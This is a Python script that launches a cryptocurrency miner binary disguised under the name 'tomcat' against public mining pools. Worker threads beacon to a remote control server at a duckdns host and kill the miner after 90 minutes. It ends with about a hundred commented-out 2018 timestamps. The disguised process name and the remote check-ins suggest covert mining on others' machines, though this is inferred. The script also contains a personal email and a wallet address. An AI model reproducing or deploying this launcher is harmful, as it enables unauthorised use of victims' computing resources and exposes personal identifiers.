import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:05.261160
#2018-02-17 15:58:04.714588
#2018-02-17 17:45:01.716161
#2018-02-17 19:33:01.807754
#2018-02-17 21:22:03.441924
#2018-02-17 23:05:08.533157
#2018-02-18 00:52:07.167826
#2018-02-18 02:41:06.222610
#2018-02-18 04:28:07.545222
#2018-02-18 06:19:04.682315
#2018-02-18 08:09:07.498545
#2018-02-18 09:56:05.969375
#2018-02-18 11:43:01.886389
#2018-02-18 13:27:07.155320
#2018-02-18 15:16:06.914481
#2018-02-18 17:05:08.076294
#2018-02-18 18:52:06.301950
#2018-02-18 20:39:02.084217
#2018-02-18 22:24:06.763431
#2018-02-19 00:13:03.293402
#2018-02-19 01:59:04.701838
#2018-02-19 03:46:04.736320
#2018-02-19 05:30:08.921451
#2018-02-19 07:17:01.927700
#2018-02-19 09:06:02.338858
#2018-02-19 10:56:03.481573
#2018-02-19 12:45:09.059061
#2018-02-19 14:34:01.880174
#2018-02-19 16:22:01.858268
#2018-02-19 18:08:09.594731
#2018-02-19 19:54:08.564089
#2018-02-19 21:41:05.116978
#2018-02-19 23:27:06.548741
#2018-02-20 01:13:04.155326
#2018-02-20 03:02:07.848372
#2018-02-20 04:51:01.642261
#2018-02-20 06:34:04.703869
#2018-02-20 08:19:05.305160
#2018-02-20 10:04:03.776904
#2018-02-20 11:48:07.731029
#2018-02-20 13:36:05.223359
#2018-02-20 15:19:03.877892
#2018-02-20 17:04:02.138760
#2018-02-20 18:51:04.973931
#2018-02-20 20:42:08.389012
#2018-02-20 22:28:02.129494
#2018-02-21 00:09:05.854744
#2018-02-21 01:54:07.459337
#2018-02-21 03:44:05.607659
#2018-02-21 05:32:07.360215
#2018-02-21 07:20:10.131456
#2018-02-21 09:05:04.727770
#2018-02-21 10:53:08.787026
#2018-02-21 12:39:08.111939
#2018-02-21 14:26:08.059338
#2018-02-21 16:12:07.634736
#2018-02-21 18:04:02.103747
#2018-02-21 19:50:09.870985
#2018-02-21 21:38:01.484073
#2018-02-21 23:24:04.679533
#2018-02-22 01:14:05.460661
#2018-02-22 03:03:03.338197
#2018-02-22 04:48:04.883937
#2018-02-22 06:33:01.300229
#2018-02-22 08:21:06.518691
#2018-02-22 10:09:01.407471
#2018-02-22 11:53:12.976444
#2018-02-22 13:39:07.202009
#2018-02-22 15:27:07.527509
#2018-02-22 17:14:12.480195
#2018-02-22 19:01:10.296433
#2018-02-22 20:52:05.794450
#2018-02-22 22:37:06.174824
#2018-02-23 00:24:01.228862
#2018-02-23 02:11:07.427510
#2018-02-23 04:01:06.426579
#2018-02-23 05:49:06.204481
#2018-02-23 07:42:04.600951
#2018-02-23 09:44:02.083372
#2018-02-23 11:49:09.470864
#2018-02-23 13:39:04.930221
#2018-02-23 15:27:04.727184
#2018-02-23 17:16:01.839851
#2018-02-23 18:59:01.734705
#2018-02-23 20:45:03.299292
#2018-02-23 22:33:07.220504
#2018-02-24 00:19:05.960611
#2018-02-24 02:11:01.751244
#2018-02-24 03:59:06.192852
#2018-02-24 06:43:07.139311
#2018-02-24 08:33:06.224074
#2018-02-24 10:19:01.713918
#2018-02-24 12:14:06.257512
#2018-02-24 14:07:01.800056
#2018-02-24 15:53:02.075902
#2018-02-24 17:38:05.387358
#2018-02-24 19:24:05.300566
#2018-02-24 21:14:05.780403
#2018-02-24 23:50:06.461531
#2018-02-25 03:11:06.620746
#2018-02-25 07:09:04.290173